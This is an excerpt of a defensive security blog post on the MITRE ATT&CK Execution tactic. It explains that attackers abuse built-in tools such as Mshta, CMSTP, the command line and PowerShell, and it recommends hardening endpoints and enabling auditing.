Of all the tactics that an adversary will take on in their campaign, none will be more widely abused than Execution (https://attack.mitre.org/wiki/Execution). When taking into consideration off-the-shelf malware, traditional ransomware, or state-of-the-art advanced persistent threat actors, all of them have execution in common. There’s a great quote from Alissa Torres which says, “Malware can hide, but it must run.”

Since malware must run, that gives defenders an opportunity to either block it or detect it. However, not all malware is going to be a malicious executable that can easily be looked up on Virus Total. In some cases, the malware will use built-in or trusted tools, some of which are available to them on every endpoint already.

Some of the techniques such as Mshta or CMSTP allow an attacker to abuse pre-installed applications for malicious purposes. The recommended way to prevent this type of attack is to remove any unnecessary code from endpoints where possible. This can be as simple as removing unnecessary services, more involved by implementing hardening controls, or as complex as running hardened and stripped-down Docker containers.

Other techniques such as Command Line Interface or PowerShell are extremely useful for attackers. In fact, a lot of fileless malware leverage one or both of these two specifically. The power of these types of techniques to attackers is that they are installed on the endpoints already and that they are rarely if ever removed. System administrators and power users rely on some of these built-in tools every day.

Even the mitigation controls in ATT&CK state that they cannot be removed and can only be audited. Attackers are relying on the fact that they will be there and are hoping they are not being audited. To gain an advantage over attackers, simply enable auditing of (Read more...)